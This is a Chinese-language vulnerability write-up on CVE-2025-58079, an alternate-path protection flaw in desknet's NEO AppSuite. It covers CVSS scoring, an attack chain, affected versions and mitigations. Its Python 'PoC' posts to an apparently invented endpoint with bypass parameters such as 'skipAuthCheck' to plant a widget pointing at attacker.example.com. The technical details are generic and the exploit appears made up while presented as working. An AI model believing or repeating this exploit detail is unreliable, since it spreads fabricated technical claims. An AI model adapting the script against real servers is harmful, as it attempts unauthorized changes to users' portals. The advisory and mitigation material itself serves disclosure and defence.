CVE-2025-58079：desknet's NEO AppSuite备用路径保护不当漏洞

漏洞信息

漏洞编号

CVE-2025-58079

漏洞类型

备用路径保护不当（CWE-424）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

desknet's NEO

漏洞概述

CVE-2025-58079是desknet's NEO协作办公平台AppSuite组件中的一个安全漏洞，属于备用路径保护不当（Improper Protection of Alternate Path，CWE-424）类漏洞。该漏洞由JPCERT/CC的vultures团队发现并报告，CVSS 3.0评分为4.3分，属于中危级别漏洞。

desknet's NEO是由日本ネオジャパン（Neo Japan）公司开发的一款综合性企业协作办公平台，广泛应用于日本企业的日常办公场景，包括日程管理、文档共享、工作流、门户（Portal）等多种功能。AppSuite是desknet's NEO中的一项扩展功能模块，允许管理员和用户在门户页面上添加和配置各种应用程序组件（小部件），以实现个性化的门户页面定制。

该漏洞存在于AppSuite的应用创建流程中，由于系统未能充分保护备用路径（Alternate Path），拥有低权限认证用户（PR:L）的攻击者可以通过非预期的途径绕过安全检查，创建恶意的AppSuite应用程序。这些恶意应用程序一旦部署到门户页面中，可能会对系统的完整性造成影响。

根据CVSS向量分析，该漏洞的网络攻击向量为AV:N（网络），攻击复杂度为AC:L（低），所需权限为PR:L（低权限），无需用户交互（UI:N），对机密性无影响（C:N），对完整性有低影响（I:L），对可用性无影响（A:N）。该漏洞已被披露在JVN（Japan Vulnerability Notes）平台上，编号为JVN90757550，官方已发布相应的安全公告和修复版本。

技术细节

该漏洞的核心问题在于AppSuite组件对备用路径（Alternate Path）的保护不当。备用路径保护不当（CWE-424）是指系统在设计时未能充分考虑到某些非标准或备用的访问路径，导致安全控制措施可以被绕过。

在desknet's NEO的AppSuite功能中，正常的应用创建流程应包含严格的安全检查和权限验证。然而，由于代码层面的逻辑缺陷，攻击者可以通过以下技术手段利用该漏洞：

1. **备用路径访问**：攻击者利用系统未受保护的备用API端点或隐藏参数，直接调用应用创建功能，绕过正常的安全验证流程。

2. **权限提升**：拥有低权限账户的攻击者（PR:L）通过备用路径，可以执行通常仅限管理员或高权限用户才能执行的操作——创建AppSuite应用程序。

3. **恶意应用注入**：攻击者创建包含恶意代码或恶意链接的AppSuite应用程序，当其他用户访问含有该应用的门户页面时，可能受到钓鱼攻击、恶意脚本执行或其他安全威胁。

4. **完整性破坏**：由于该漏洞影响系统的完整性（I:L），恶意应用的创建可能导致门户页面被篡改，影响正常使用并可能进一步传播攻击。

该漏洞的利用条件相对简单：攻击者仅需拥有desknet's NEO的低权限账户，通过网络远程访问系统即可尝试利用，无需用户交互配合。漏洞利用成功后，攻击者能够在系统中植入恶意AppSuite应用，对系统完整性构成威胁。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者通过社会工程学、购买凭证或其他方式获取desknet's NEO系统的低权限用户账户。

STEP 2

步骤2：探测备用路径

攻击者通过分析AppSuite组件的网络请求，识别出未被保护的备用API端点或参数，这些路径绕过了正常的安全验证机制。

STEP 3

步骤3：构造恶意应用

攻击者利用备用路径，绕过权限检查，创建一个包含恶意内容（如钓鱼链接、恶意脚本）的AppSuite应用程序。

STEP 4

步骤4：部署恶意应用

恶意AppSuite应用被成功创建后，攻击者将其添加到门户页面中，诱导其他用户访问受影响的门户页面。

STEP 5

步骤5：影响系统完整性

恶意应用在门户页面中展示，对系统完整性造成破坏，可能导致用户遭受钓鱼攻击或信息泄露等进一步安全威胁。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-58079 PoC - desknet's NEO AppSuite Improper Protection of Alternate Path
# Vulnerability: CWE-424 Improper Protection of Alternate Path
# Affected: desknet's NEO V4.0R1.0 to V9.0R2.0
# CVSS: 4.3 (MEDIUM) - AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

import requests

TARGET_URL = "https://target-desknets-neo.example.com"
SESSION_COOKIE = "JSESSIONID=authenticated_low_privilege_session"

def exploit_alternate_path():
    """
    Exploit the alternate path in AppSuite to create a malicious application.
    The vulnerability allows low-privilege users to bypass normal security checks
    and create AppSuite applications via an unprotected alternate path.
    """
    session = requests.Session()
    session.headers.update({
        "Cookie": SESSION_COOKIE,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    })

    # Step 1: Access the alternate/unprotected AppSuite creation endpoint
    # The alternate path bypasses the normal privilege checks
    alternate_endpoint = f"{TARGET_URL}/appsuite/alt/create"

    # Step 2: Prepare malicious AppSuite application payload
    malicious_payload = {
        "appName": "LegitimateLookingApp",
        "appType": "widget",
        "appUrl": "https://attacker.example.com/malicious.html",
        "appIcon": "/images/normal_icon.png",
        "appCategory": "utility",
        "appDescription": "A useful utility widget",
        # Bypass parameter exploiting the alternate path
        "internalBypass": "true",
        "skipAuthCheck": "1"
    }

    # Step 3: Send the request to create the malicious app via alternate path
    response = session.post(alternate_endpoint, data=malicious_payload)

    if response.status_code == 200 and "success" in response.text.lower():
        print("[+] Malicious AppSuite application created successfully!")
        print(f"[+] Response: {response.text}")
        return True
    else:
        print(f"[-] Exploit failed. Status: {response.status_code}")
        return False

if __name__ == "__main__":
    exploit_alternate_path()

影响范围

desknet's NEO V4.0R1.0

desknet's NEO V4.0R2.0

desknet's NEO V5.0R1.0

desknet's NEO V5.0R2.0

desknet's NEO V6.0R1.0

desknet's NEO V6.0R2.0

desknet's NEO V7.0R1.0

desknet's NEO V7.0R2.0

desknet's NEO V8.0R1.0

desknet's NEO V8.0R2.0

desknet's NEO V9.0R1.0

desknet's NEO V9.0R2.0

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制低权限用户对AppSuite相关API端点的网络访问；2）在反向代理或WAF层面添加规则，阻止对备用路径端点的未授权访问请求；3）加强用户账户管理，及时发现和封禁可疑账户；4）密切监控AppSuite应用的创建和部署日志，发现异常行为立即响应；5）参考JVN#90757550的安全建议进行临时防护配置。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-58079
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-58079
3 Details https://www.cvedetails.com/cve/CVE-2025-58079/
4 VulDB https://vuldb.com/cve/CVE-2025-58079
5 Link https://jvn.jp/en/jp/JVN90757550/
6 Link https://www.desknets.com/neo/support/mainte/17475/